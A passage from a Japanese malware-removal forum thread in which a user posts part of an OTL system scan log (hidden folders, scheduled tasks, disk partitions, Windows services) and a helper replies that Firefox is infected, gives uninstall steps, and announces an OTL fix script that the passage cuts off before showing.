[2015/02/04 08:11:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.MobileSync.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources\English.lproj
  • あすとろ
  • 2015/09/12 (Sat) 23:45:18
返信フォームへ 
OTL4
[2014/07/11 01:11:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\EAInstaller\PlantsvsZombies
[2013/08/08 09:41:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Intel Corporation\IAStorUtil
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit
[2010/11/21 16:25:34 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\ink\HWRCustomization
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv\ja-JP
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit\ja-JP
[2012/06/20 12:00:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4074ef21cd4e900a
[2012/06/20 12:00:48 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4f2f72d1cd4e900e
[2012/06/20 12:00:49 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e57d06fd1cd4e9010
[2012/06/20 12:00:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e6a692ff1cd4e9015
[2012/06/20 12:00:53 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e7ac6a5d1cd4e9017
[2012/06/20 12:00:54 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e84e47f01cd4e9019
[2012/06/20 12:00:58 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eab46af71cd4e901c
[2012/06/20 12:01:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eca127d01cd4e9020
[2012/06/20 12:01:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\ee1ba29b1cd4e9023
[2012/06/20 12:01:08 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f0926f441cd4e9025
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f1f0598c1cd4e9027
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f23300141cd4e9029
[2012/06/20 12:01:11 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f2a07f601cd4e902b
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f376bb391cd4e902d
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f3d853a41cd4e9030
[2012/06/20 12:01:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f41898cc1cd4e9031
[2012/06/20 12:01:15 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f4cfe2c11cd4e9034
[2012/06/20 12:01:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f59a37b81cd4e9036
[2012/06/20 12:01:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f5fe31831cd4e9038
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f6e9d9bf1cd4e903a
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f701a7811cd4e903c
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f73143071cd4e903e
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f74b722a1cd4e9040
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Chs\images
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Cht\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Csy\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Dan\images
[2012/06/20 12:13:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Deu\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ell\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Enu\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Esp\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fin\images
[2012/06/20 12:13:21 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fra\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Hun\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ita\images
[2012/06/20 12:13:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Jpn\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Kor\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nld\images
[2012/06/20 12:13:25 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nor\images
[2012/06/20 12:13:26 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Plk\images
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\ProgramData\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc\Profiles
[2014/04/01 21:29:29 | 000,000,000 | RH-D | M] -- C:\Users\Default
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc\Profiles
[2009/07/14 12:20:08 | 000,000,000 | -H-D | M] -- C:\Users\Default\AppData
[2014/04/01 21:29:34 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData
[2014/04/09 23:21:59 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads
[2014/04/01 21:31:40 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~
[2015/02/13 17:57:57 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~
[2015/01/09 07:31:54 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Media Player\アート キャッシュ
[2014/04/01 21:31:51 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn
[2014/05/06 04:02:09 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn1
[2015/06/16 21:11:40 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn2
[2015/07/08 21:48:36 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn3
[2015/06/10 15:43:46 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame
[2015/06/10 15:43:45 | 000,565,248 | -H-- | M] (NHN Japan Corp.) -- C:\Users\kaito\AppData\Roaming\Hangame\hgstarterjp.exe
[2015/06/10 17:50:08 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame\HUL
[2014/04/16 23:21:26 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
[2015/06/10 15:28:53 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\IETldCache\Low
[2015/09/11 09:27:59 | 000,000,000 | RH-D | M] -- C:\Users\Public\Desktop
[2009/07/14 11:34:59 | 000,000,000 | RH-D | M] -- C:\Users\Public\Favorites
[2014/04/13 00:58:19 | 000,000,000 | RH-D | M] -- C:\Users\Public\Libraries
[2014/12/19 17:25:39 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\LocalService\AppData
[2014/04/02 21:12:09 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\NetworkService\AppData

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/09/12 17:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/12 00:02:08 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/12 17:02:38 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/12 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/12 16:48:00 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000LPVX-22V0TT0
Partitions: 3
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 18.00GB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: Installable File System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 19328401408
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 448.00GB
Starting Offset: 19433259008
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2015/03/04 13:41:26 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2013/02/27 14:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2009/07/14 10:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/14 10:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2012/07/05 07:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:56 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2015/02/03 12:12:14 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/21 12:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2011/07/14 16:24:58 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/14 10:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/14 10:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 13:17:27 | 000,303,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2011/09/21 20:51:57 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2012/02/11 15:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/21 12:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/21 12:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/19 12:06:55 | 000,210,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2010/11/21 12:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
No service found with a name of WinDefend
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/21 12:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/25 12:24:41 | 002,553,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]

< End of report >


以上です。
  • あすとろ
  • 2015/09/12 (Sat) 23:46:20
返信フォームへ 
これは酷い
Firefoxに感染しています。
後でFirefoxを入れなおしますが、まずは感染状態から開放させなければなりません。
GUを利用してFirefoxをアンインストールしてください。
アンインストールが完了しましたら、OTLで処置を行いましょう。

メモ帳を起動させ、以下をコピペしてください。
なお、:OTL、:Files、:Commands等はOTLでの処理方法を決める命令文です。
削除なされないようご注意ください。

------コピペこの下より------
